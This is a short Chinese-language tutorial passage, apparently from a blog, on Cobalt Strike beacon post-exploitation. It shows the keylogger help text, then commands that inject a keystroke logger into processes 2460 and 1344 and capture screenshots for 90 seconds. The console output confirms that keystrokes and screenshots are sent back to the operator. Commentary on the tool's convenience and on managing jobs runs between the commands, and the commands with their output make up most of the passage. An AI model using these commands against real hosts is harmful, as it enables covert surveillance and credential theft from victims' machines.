beacon> help keylogger
Use: keylogger [pid] <x86|x64>
Inject a keystroke logger into the specified process. Use jobkill to terminate
this task early.
Use keylogger with no arguments to spawn a temporary process and inject the
keystroke logger into it.
可以看到简介 可以使用2种方式 一种是进程注入 一种是直接使用 到这里我顺便介绍一些命令吧 ps 显示目标进程
beacon> keylogger 2460
[*] Tasked beacon to log keystrokes in 2460 (x86)
[+] host called home, sent: 65610 bytes
[+] received keystrokes
不得不说Cobalt Strike还是比较人性化,他给我们提供了很方便的操作,能多选目标 然后右键 获取进程注入键盘记录,屏幕截屏等。
beacon> screenshot 1344 x86 90
[*] Tasked beacon to take screenshots in 1344/x86 for next 90 seconds
[+] host called home, sent: 162832 bytes
[+] host called home, sent: 58 bytes
[*] received screenshot (116332 bytes)
[*] received screenshot (112961 bytes)
同样 也是可以使用批量的
在我们不需要这些进程的时候 可以 在beacon里面运行 jobs 查看任务进程在用jobkill JID来结束进程
beacon> keylogger 1344 x86
[*] Tasked beacon to log keystrokes in 1344 (x86)
[+] host called home, sent: 65610 bytes
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs
JID PID Description
--- --- -----------
5 1344 keystroke logger
beacon> jobkill 5
[*] Tasked beacon to kill job 5
[+] host called home, sent: 10 bytes
貌似Cobalt Strike 截图的时候目标系统会有明显的卡顿,还有个远控功能还是建议大家别用不是很好(用时半小时)